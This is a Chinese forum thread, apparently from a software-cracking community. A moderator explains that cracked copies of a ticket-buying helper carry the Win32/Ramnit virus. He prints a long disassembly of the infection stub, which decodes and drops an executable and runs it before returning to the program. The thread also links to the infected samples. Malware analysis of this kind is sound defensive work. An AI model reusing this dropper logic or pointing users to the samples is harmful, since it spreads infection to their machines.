关于近期“吾易购票助手”含有病毒问题说明

Hmily

最近在看到论坛有很多会员在分析破解“吾易购票助手”，发布的作品文件没问题，但运行后会释放被感染的病毒程序，我已经看到多个会员发布的文件有这样的问题。

在此特别感谢很执着的会员 @用力抱着。  一直在跟我抱怨是我误判，我做病毒分析好几年了，确认会释放运行病毒，也能看出来不是你们自己破解加的，怀疑是软件作者发现被破解就是放病毒，你发的那文件现在下不到了，提供一下我来分析给你看下。

对于病毒一般杀软都不会误报，如果报木马误报还有可能，大家可以一起来分析下这个“吾易购票助手”。

Hmily

看来是你自己已经感染病毒了，虽然你加了SE的壳，但病毒其实是在壳和程序中间执行的，意思就是原始程序已经感染了病毒然后才被加壳的。


程序执行完se壳代码跳到病毒执行的地方：


病毒执行完从上面jmp eax跳到原始程序入口继续执行：


感染病毒的代码：

[Asm] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260

00C20000    92                 xchg eax,edx 00C20001    E8 00000000        call www_52po.00C20006 00C20006    5D                 pop ebp 00C20007    8BC5               mov eax,ebp 00C20009    81ED 326F0120      sub ebp,0x20016F32 00C2000F    2B85 50720120      sub eax,dword ptr ss:[ebp+0x20017250] 00C20015    8985 4C720120      mov dword ptr ss:[ebp+0x2001724C],eax 00C2001B    B0 00              mov al,0x0 00C2001D    8685 9E740120      xchg byte ptr ss:[ebp+0x2001749E],al 00C20023    3C 01              cmp al,0x1 00C20025    0F85 DE020000      jnz www_52po.00C20309 00C2002B    8B85 4C720120      mov eax,dword ptr ss:[ebp+0x2001724C] 00C20031    2B85 58720120      sub eax,dword ptr ss:[ebp+0x20017258] 00C20037    8B00               mov eax,dword ptr ds:[eax] 00C20039    8985 EA730120      mov dword ptr ss:[ebp+0x200173EA],eax 00C2003F    8B85 4C720120      mov eax,dword ptr ss:[ebp+0x2001724C] 00C20045    2B85 5C720120      sub eax,dword ptr ss:[ebp+0x2001725C] 00C2004B    8B00               mov eax,dword ptr ds:[eax] 00C2004D    8985 F2730120      mov dword ptr ss:[ebp+0x200173F2],eax 00C20053    83BD F2730120 00   cmp dword ptr ss:[ebp+0x200173F2],0x0 00C2005A    0F84 A9020000      je www_52po.00C20309 00C20060    83BD EA730120 00   cmp dword ptr ss:[ebp+0x200173EA],0x0 00C20067    0F84 9C020000      je www_52po.00C20309 00C2006D    8D85 8D740120      lea eax,dword ptr ss:[ebp+0x2001748D] 00C20073    50                 push eax 00C20074    FF95 EA730120      call dword ptr ss:[ebp+0x200173EA] 00C2007A    83F8 00            cmp eax,0x0 00C2007D    0F84 86020000      je www_52po.00C20309 00C20083    8985 E6730120      mov dword ptr ss:[ebp+0x200173E6],eax 00C20089    8D85 16740120      lea eax,dword ptr ss:[ebp+0x20017416] 00C2008F    50                 push eax 00C20090    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C20096    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C2009C    83F8 00            cmp eax,0x0 00C2009F    0F84 58020000      je www_52po.00C202FD 00C200A5    8985 EE730120      mov dword ptr ss:[ebp+0x200173EE],eax 00C200AB    8D85 22740120      lea eax,dword ptr ss:[ebp+0x20017422] 00C200B1    50                 push eax 00C200B2    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C200B8    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C200BE    83F8 00            cmp eax,0x0 00C200C1    0F84 36020000      je www_52po.00C202FD 00C200C7    8985 F6730120      mov dword ptr ss:[ebp+0x200173F6],eax 00C200CD    8D85 3B740120      lea eax,dword ptr ss:[ebp+0x2001743B] 00C200D3    50                 push eax 00C200D4    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C200DA    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C200E0    83F8 00            cmp eax,0x0 00C200E3    0F84 14020000      je www_52po.00C202FD 00C200E9    8985 FE730120      mov dword ptr ss:[ebp+0x200173FE],eax 00C200EF    8D85 2F740120      lea eax,dword ptr ss:[ebp+0x2001742F] 00C200F5    50                 push eax 00C200F6    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C200FC    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C20102    83F8 00            cmp eax,0x0 00C20105    0F84 F2010000      je www_52po.00C202FD 00C2010B    8985 FA730120      mov dword ptr ss:[ebp+0x200173FA],eax 00C20111    8D85 48740120      lea eax,dword ptr ss:[ebp+0x20017448] 00C20117    50                 push eax 00C20118    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C2011E    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C20124    83F8 00            cmp eax,0x0 00C20127    0F84 D0010000      je www_52po.00C202FD 00C2012D    8985 02740120      mov dword ptr ss:[ebp+0x20017402],eax 00C20133    8D85 55740120      lea eax,dword ptr ss:[ebp+0x20017455] 00C20139    50                 push eax 00C2013A    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C20140    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C20146    83F8 00            cmp eax,0x0 00C20149    0F84 AE010000      je www_52po.00C202FD 00C2014F    8985 06740120      mov dword ptr ss:[ebp+0x20017406],eax 00C20155    8D85 61740120      lea eax,dword ptr ss:[ebp+0x20017461] 00C2015B    50                 push eax 00C2015C    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C20162    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C20168    83F8 00            cmp eax,0x0 00C2016B    0F84 8C010000      je www_52po.00C202FD 00C20171    8985 0A740120      mov dword ptr ss:[ebp+0x2001740A],eax 00C20177    8D85 6B740120      lea eax,dword ptr ss:[ebp+0x2001746B] 00C2017D    50                 push eax 00C2017E    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C20184    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C2018A    83F8 00            cmp eax,0x0 00C2018D    0F84 6A010000      je www_52po.00C202FD 00C20193    8985 0E740120      mov dword ptr ss:[ebp+0x2001740E],eax 00C20199    8D85 7E740120      lea eax,dword ptr ss:[ebp+0x2001747E] 00C2019F    50                 push eax 00C201A0    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C201A6    FF95 F2730120      call dword ptr ss:[ebp+0x200173F2] 00C201AC    83F8 00            cmp eax,0x0 00C201AF    0F84 48010000      je www_52po.00C202FD 00C201B5    8985 12740120      mov dword ptr ss:[ebp+0x20017412],eax 00C201BB    8D85 78720120      lea eax,dword ptr ss:[ebp+0x20017278] 00C201C1    50                 push eax 00C201C2    6A 01              push 0x1 00C201C4    6A 00              push 0x0 00C201C6    FF95 F6730120      call dword ptr ss:[ebp+0x200173F6] 00C201CC    50                 push eax 00C201CD    FF95 02740120      call dword ptr ss:[ebp+0x20017402] 00C201D3    5B                 pop ebx 00C201D4    50                 push eax 00C201D5    53                 push ebx 00C201D6    53                 push ebx 00C201D7    FF95 FE730120      call dword ptr ss:[ebp+0x200173FE] 00C201DD    FF95 FA730120      call dword ptr ss:[ebp+0x200173FA] 00C201E3    58                 pop eax 00C201E4    3D B7000000        cmp eax,0xB7 00C201E9    0F84 0E010000      je www_52po.00C202FD 00C201EF    8B8D 9A740120      mov ecx,dword ptr ss:[ebp+0x2001749A] 00C201F5    8DBD 9E740120      lea edi,dword ptr ss:[ebp+0x2001749E] 00C201FB    47                 inc edi 00C201FC    BA 00000000        mov edx,0x0 00C20201    0BD2               or edx,edx 00C20203    75 07              jnz short www_52po.00C2020C 00C20205    8B95 60720120      mov edx,dword ptr ss:[ebp+0x20017260] 00C2020B    4A                 dec edx 00C2020C    8A9C2A 64720120    mov bl,byte ptr ds:[edx+ebp+0x20017264] 00C20213    321F               xor bl,byte ptr ds:[edi] 00C20215    881F               mov byte ptr ds:[edi],bl 00C20217    47                 inc edi 00C20218    4A                 dec edx 00C20219  ^ E2 E6              loopd short www_52po.00C20201 00C2021B    68 FF000000        push 0xFF 00C20220    8D85 92720120      lea eax,dword ptr ss:[ebp+0x20017292] 00C20226    50                 push eax 00C20227    6A 00              push 0x0 00C20229    FF95 0E740120      call dword ptr ss:[ebp+0x2001740E] 00C2022F    8BC8               mov ecx,eax 00C20231    8D9D 92720120      lea ebx,dword ptr ss:[ebp+0x20017292] 00C20237    03C3               add eax,ebx 00C20239    FD                 std 00C2023A    8BF8               mov edi,eax 00C2023C    B0 2E              mov al,0x2E 00C2023E    F2:AE              repne scas byte ptr es:[edi] 00C20240    47                 inc edi 00C20241    FC                 cld 00C20242    8DB5 8A720120      lea esi,dword ptr ss:[ebp+0x2001728A] 00C20248    B9 08000000        mov ecx,0x8 00C2024D    F3:A4              rep movs byte ptr es:[edi],byte ptr ds:[esi] 00C2024F    6A 00              push 0x0 00C20251    68 80000000        push 0x80 00C20256    6A 02              push 0x2 00C20258    6A 00              push 0x0 00C2025A    6A 02              push 0x2 00C2025C    68 00000040        push 0x40000000 00C20261    8D85 92720120      lea eax,dword ptr ss:[ebp+0x20017292] 00C20267    50                 push eax 00C20268    FF95 06740120      call dword ptr ss:[ebp+0x20017406] 00C2026E    83F8 FF            cmp eax,-0x1 00C20271    0F84 86000000      je www_52po.00C202FD 00C20277    50                 push eax 00C20278    8BD0               mov edx,eax 00C2027A    6A 00              push 0x0 00C2027C    8D85 48720120      lea eax,dword ptr ss:[ebp+0x20017248] 00C20282    50                 push eax 00C20283    FFB5 9A740120      push dword ptr ss:[ebp+0x2001749A] 00C20289    8D9D 9E740120      lea ebx,dword ptr ss:[ebp+0x2001749E] 00C2028F    43                 inc ebx 00C20290    53                 push ebx 00C20291    52                 push edx 00C20292    FF95 0A740120      call dword ptr ss:[ebp+0x2001740A] 00C20298    FF95 FA730120      call dword ptr ss:[ebp+0x200173FA] 00C2029E    FC                 cld 00C2029F    B9 44000000        mov ecx,0x44 00C202A4    8DBD 92730120      lea edi,dword ptr ss:[ebp+0x20017392] 00C202AA    B0 00              mov al,0x0 00C202AC    F3:AA              rep stos byte ptr es:[edi] 00C202AE    B9 10000000        mov ecx,0x10 00C202B3    8DBD D6730120      lea edi,dword ptr ss:[ebp+0x200173D6] 00C202B9    B0 00              mov al,0x0 00C202BB    F3:AA              rep stos byte ptr es:[edi] 00C202BD    8D85 D6730120      lea eax,dword ptr ss:[ebp+0x200173D6] 00C202C3    50                 push eax 00C202C4    8D85 92730120      lea eax,dword ptr ss:[ebp+0x20017392] 00C202CA    50                 push eax 00C202CB    6A 00              push 0x0 00C202CD    6A 00              push 0x0 00C202CF    6A 00              push 0x0 00C202D1    6A 00              push 0x0 00C202D3    6A 00              push 0x0 00C202D5    6A 00              push 0x0 00C202D7    8D85 92720120      lea eax,dword ptr ss:[ebp+0x20017292] 00C202DD    50                 push eax 00C202DE    6A 00              push 0x0 00C202E0    FF95 12740120      call dword ptr ss:[ebp+0x20017412] 00C202E6    8DBD D6730120      lea edi,dword ptr ss:[ebp+0x200173D6] 00C202EC    FF37               push dword ptr ds:[edi] 00C202EE    FF77 04            push dword ptr ds:[edi+0x4] 00C202F1    FF95 FA730120      call dword ptr ss:[ebp+0x200173FA] 00C202F7    FF95 FA730120      call dword ptr ss:[ebp+0x200173FA] 00C202FD    FFB5 E6730120      push dword ptr ss:[ebp+0x200173E6] 00C20303    FF95 EE730120      call dword ptr ss:[ebp+0x200173EE] 00C20309    8B85 4C720120      mov eax,dword ptr ss:[ebp+0x2001724C] 00C2030F    2B85 54720120      sub eax,dword ptr ss:[ebp+0x20017254] 00C20315    894424 1C          mov dword ptr ss:[esp+0x1C],eax 00C20319    61                 popad 00C2031A    FFE0               jmp eax 00C2031C    00DC               add ah,bl 00C2031E    0000               add byte ptr ds:[eax],al 00C20320    0000               add byte ptr ds:[eax],al 00C20322    C2 0006            retn 0x600 00C20325    0000               add byte ptr ds:[eax],al 00C20327    00A0 84660074      add byte ptr ds:[eax+0x74006684],ah 00C2032D    4C                 dec esp 00C2032E    6200               bound eax,qword ptr ds:[eax] 00C20330    284C62 00          sub byte ptr ds:[edx],cl 00C20334    14 00              adc al,0x0 00C20336    0000               add byte ptr ds:[eax],al 00C20338    A1 E65E92C1        mov eax,dword ptr ds:[0xC1925EE6] 00C2033D    B0 B7              mov al,0xB7 00C2033F    AF                 scas dword ptr es:[edi] 00C20340    26:98              cwde 00C20342    4C                 dec esp 00C20343    D88CEB B142D7A3    fmul dword ptr ds:[ebx+ebp*8+0xA3D742B1] 00C2034A    B5 24              mov ch,0x24 00C2034C    4B                 dec ebx 00C2034D    79 55              jns short www_52po.00C203A4 00C2034F    66:                prefix datasize: 00C20350    66:54              push sp 00C20352    68 4F6B5977        push 0x77596B4F 00C20357    52                 push edx 00C20358    52                 push edx 00C20359    74 67              je short www_52po.00C203C2 00C2035B    50                 push eax 00C2035C    50                 push eax 00C2035D    0053 72            add byte ptr ds:[ebx+0x72],dl 00C20360    76 2E              jbe short www_52po.00C20390 00C20362    65:78 65           js short www_52po.00C203CA 00C20365    0043 3A            add byte ptr ds:[ebx+0x3A],al 00C20368    5C                 pop esp 00C20369    44                 inc esp 00C2036A    6F                 outs dx,dword ptr es:[edi] 00C2036B    6375 6D            arpl word ptr ss:[ebp+0x6D],si 00C2036E    65:6E              outs dx,byte ptr es:[edi] 00C20370    74 73              je short www_52po.00C203E5 00C20372    2061 6E            and byte ptr ds:[ecx+0x6E],ah 00C20375    64:2053 65         and byte ptr fs:[ebx+0x65],dl 00C20379    74 74              je short www_52po.00C203EF 00C2037B    696E 67 735C4164   imul ebp,dword ptr ds:[esi+0x67],0x64415C73 00C20382    6D                 ins dword ptr es:[edi],dx 00C20383    696E 69 73747261   imul ebp,dword ptr ds:[esi+0x69],0x61727473 00C2038A    74 6F              je short www_52po.00C203FB 00C2038C    72 5C              jb short www_52po.00C203EA 00C2038E    D7                 xlat byte ptr ds:[ebx+al] 00C2038F    C0C3 E6            rol bl,0xE6 00C20392    5C                 pop esp 00C20393    CE                 into 00C20394  ^ E1 D2              loopde short www_52po.00C20368 00C20396    D7                 xlat byte ptr ds:[ebx+al] 00C20397    B9 BAC6B131        mov ecx,0x31B1C6BA 00C2039C    3238               xor bh,byte ptr ds:[eax] 00C2039E    5C                 pop esp 00C2039F    77 77              ja short www_52po.00C20418 00C203A1    77 2E              ja short www_52po.00C203D1 00C203A3    35 32706F6A        xor eax,0x6A6F7032 00C203A8    6965 2E 636E5F73   imul esp,dword ptr ss:[ebp+0x2E],0x735F6E63 00C203AF    65:53              push ebx 00C203B1    72 76              jb short www_52po.00C20429 00C203B3    2E:                prefix cs: 00C203B4    65:78 65           js short www_52po.00C2041C

这玩意就是很老的病毒，名字是Win32/Ramnit，你可以去搜下，你是不是没装杀毒软件？自己感染了都不知道吧？@用力抱着。

她的韩冷，

大神驾到了，

mzw493

感谢执着的人~

紫衫红叶

我靠,本身就带病毒的文件,这暗装.......

Zyc921

看来我们这些在病毒方面的小白必须得装杀毒软件吖 不然被感染还什么都不知道

ii丶BigBreast

先来个沙发惊现H大

Hmily

病毒是Win32/Ramnit感染。

Hmily

用力抱着。 发表于 2015-2-2 14:09
下载地址 http://pan.baidu.com/s/1i304kGd 请H大分析

我刚看了下原版没发现有释放病毒，你这个一下就释放了，简单先给你来个图

时过境迁

http://pan.baidu.com/s/10I1iu   请大神分析

wuwenhao1991

  感谢大神

疯狂的破解员

坐看大牛病毒分析

hyy110

很想知道结果

无趣水瓶

额 凑个热闹 坐等大神

我爱你王飞燕

看看，坐等大神

skoo1

前排出售小板凳，瓜子等小食品

用力抱着。

谢谢H大关注，是我疏忽了。应该是作者带后门。

用力抱着。

下载地址 http://pan.baidu.com/s/1i304kGd 请H大分析